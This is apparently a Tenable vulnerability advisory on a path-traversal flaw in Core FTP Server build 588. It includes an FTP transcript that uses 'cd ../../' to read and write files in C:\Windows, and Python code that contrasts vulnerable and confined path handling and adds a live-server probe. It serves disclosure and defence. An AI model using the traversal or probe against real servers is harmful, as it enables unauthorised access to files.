
[R1] Core FTP Server Path Traversal Arbitrary File/Directory Access




Core FTP Server 1.2 build 588 (32-bit or 64-bit), released on April 7, 2016, was installed. This finding is based on setting the "domain properties" via the GUI so that the "Base directory" is C:\Users\Public and the authentication method "Enable WinNT users" is checked. The "Enable WinNT users" authentication method allows the remote user to log in as one of the existing Windows users. No other major settings were altered. On the server where Core FTP Server is installed, we added a native Windows administrative user named "admin".

A Case of Documentation?

The documentation for Core FTP Server is fairly minimal, enough to get it configured and working. However, the "Enable WinNT users" functionality (the check box is visible in the second image at http://www.coreftp.com/server/help/Create_Domain.htm) comes with no warning or explanation of what it means, beyond the context of using the native Windows accounts for authentication. Historically, FTP servers set a 'base directory' much like web servers set a 'docroot', with the intention that this location is the highest point in the directory tree a user can access. Historical traversal attacks bypassed that limitation, allowing access to files and/or directories elsewhere on the system. The relevant documentation states:

   5:  Choose a base directory where all directories and user directories will exist.
   If you are choosing a networked drive, you may need to modify the account in the Core FTP Server's service properties, as the system account may not have access to the network drive.

   As a reminder, if you lock a user in their home directory, they will not be able to access virtual paths.

However, locking a user in the home directory does not work with WinNT authentication. Based on the above, an administrator installing Core FTP Server may reasonably expect it to limit users to the configured Base directory and its subdirectories only.

Relative Path Traversal

Logging in as "admin" to the target machine when 'Enable WinNT users' is configured, Core FTP Server should restrict the user to C:\Users\Public and its subdirectories. However, using a simple relative traversal (e.g. ../../) via the 'cd' command, an attacker can climb out of the base directory to "C:\", download files (e.g. win.ini from C:\Windows), and create files (e.g. "albino_lobster.txt" in C:\Windows):

madagascar:~ tenrec$ ftp admin@
Connected to
220-Core FTP Server Version 1.2, build 588, 64-bit, installed 0 days ago Unregistered
220-Hello Friend
331 password required for admin
230-Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (192,168,1,3,237,224).
150 Opening ASCII mode data connection
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Capybara
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Downloads
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Music
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Pictures
dr-xr-xr-x   1 owner    group               0 Nov 21  2010 Recorded TV
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Warez
226 Transfer Complete
ftp> cd ../../
250 CWD command successful
ftp> pwd
Remote directory: /
ftp> ls
227 Entering Passive Mode (192,168,1,3,237,227).
150 Opening ASCII mode data connection
dr-xr-xrwx   1 owner    group               0 Apr  4 12:39 cygwin65
dr-xr-xr-x   1 owner    group               0 Apr 18 10:30 Program Files
dr-xr-xr-x   1 owner    group               0 Apr 18 13:54 Program Files (x86)
dr-xr-xrwx   1 owner    group               0 Apr 18 10:29 Python9000
dr-xr-xr-x   1 owner    group               0 Apr 18 14:59 Users
dr-xr-xrwx   1 owner    group               0 Apr 18 16:58 Windows
226 Transfer Complete
ftp> cd Windows
250 CWD command successful
ftp> get win.ini
local: win.ini remote: win.ini
227 Entering Passive Mode (192,168,1,3,237,248).
150 RETR command started
   403        2.88 MiB/s 
226 Transfer Complete
403 bytes received in 00:00 (1.32 MiB/s)
ftp> put albino_lobster.txt 
local: albino_lobster.txt remote: albino_lobster.txt
227 Entering Passive Mode (192,168,1,3,238,4).
150 STOR command started
100% |********************************************************************************************************|     4        2.00 KiB/s    00:00 ETA
226 Transfer Complete
4 bytes sent in 00:00 (1.52 KiB/s)

Note that if you log in as a non-administrator, you cannot write to C:\Windows; the filesystem permissions of the Windows account used to log in still apply, so the impact of the traversal depends on that account's privileges.
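The following is an added example written for this page, not code from Core FTP Server or from Tenable. It puts the vulnerable pattern the transcript illustrates (splice the client path onto the base directory and let the OS collapse '..') beside the confinement logic a server needs before honouring CWD, RETR or STOR, and includes a small probe that reproduces the 'cd ../../' check against a live ftplib session. The class and function names (FtpSandbox, naive_resolve, probe_traversal) and the marker directory names are this example's own assumptions.

```python
"""Base-directory confinement for FTP paths (added example, not vendor code)."""
import ntpath
import posixpath
from pathlib import PureWindowsPath

BASE_DIR = r"C:\Users\Public"   # the "Base directory" configured in the advisory


def naive_resolve(base_dir: str, requested: str) -> str:
    """Illustration of the vulnerable pattern, reconstructed from the observed
    behaviour (not the vendor's source): join the client path onto the base
    directory and let ntpath collapse '..', so '../../' walks up to 'C:\\'."""
    return ntpath.normpath(ntpath.join(base_dir, requested.replace("/", "\\")))


class FtpSandbox:
    """Virtual filesystem rooted at base_dir.

    Client-supplied paths are treated as POSIX-style paths under a virtual '/',
    normalised there, and only then mapped onto the real Windows directory.
    Because normalisation happens below the virtual root, '..' can never climb
    above the base directory."""

    def __init__(self, base_dir: str):
        self.base = PureWindowsPath(base_dir)
        self.cwd = "/"  # virtual working directory, '/' == base_dir

    def _virtual(self, requested: str) -> str:
        req = requested.replace("\\", "/")  # some clients send backslashes
        if not req.startswith("/"):
            req = posixpath.join(self.cwd, req)
        # normpath collapses '.', '..' and '//'; '..' at the virtual root stays
        # at the root, so '/../../' becomes '/'.
        return posixpath.normpath(req)

    def resolve(self, requested: str) -> PureWindowsPath:
        """Map a client path to the real path, or raise PermissionError."""
        virt = self._virtual(requested)
        parts = [p for p in virt.split("/") if p]
        for p in parts:
            # A drive letter (C:) would make pathlib re-root the path and a NUL
            # would truncate it in the Win32 API; refuse both outright.
            if ":" in p or "\0" in p:
                raise PermissionError(f"illegal path component: {p!r}")
        real = self.base.joinpath(*parts)
        # Belt and braces: the mapped path must still start with the base.
        if real.parts[: len(self.base.parts)] != self.base.parts:
            raise PermissionError(f"{requested!r} escapes {self.base}")
        return real

    def change_dir(self, requested: str) -> str:
        """CWD handler: only update cwd once the target is known to be inside."""
        self.resolve(requested)
        self.cwd = self._virtual(requested)
        return self.cwd


def probe_traversal(ftp, markers=("Windows", "Program Files", "Program Files (x86)")):
    """Reproduce the advisory's check against a logged-in ftplib.FTP session
    (or any object exposing the same cwd()/nlst() methods): climb with
    CWD ../../ and look for directory names that only exist at the drive root.
    Returns the markers seen; an empty tuple means the server kept the session
    inside its base directory (either by refusing CWD or by clamping it)."""
    try:
        ftp.cwd("../../")
    except Exception:  # ftplib raises error_perm when the server refuses
        return ()
    seen = set(ftp.nlst())
    return tuple(m for m in markers if m in seen)


if __name__ == "__main__":
    print("vulnerable:", naive_resolve(BASE_DIR, "../../Windows/win.ini"))
    sb = FtpSandbox(BASE_DIR)
    print("hardened cwd after ../../ :", sb.change_dir("../../"))
    print("hardened resolve         :", sb.resolve("../../Windows/win.ini"))
```

The sandbox works because normalisation is done in the virtual namespace, where the root is the base directory, rather than on the real Windows path; the final prefix check and the rejection of drive-letter components are defence in depth against pathlib re-rooting a join. To use the probe against a real server, log in with ftplib.FTP(host) and login(user, password), then pass the session object to probe_traversal().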


Upgrade to Core FTP Server 1.2, build 589 to resolve this issue. Note that the build 588 forum post was edited by Core FTP to mention build 589, so the post appears to be backdated.

Tenable would like to acknowledge not only the quick response time in emails, but the incredibly fast turnaround on providing a new build to resolve this issue. Outstanding work.

Disclosure Timeline

2016-04-18 - Issue discovered
2016-04-29 - Reported to vendor via feedback@coreftp.com
2016-04-29 - Vendor acks issue, working on patch
2016-04-29 - Vendor replies, Build 589 released to address issue
2016-05-02 - Tenable confirms updated build fixes issue

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email advisories@tenable.com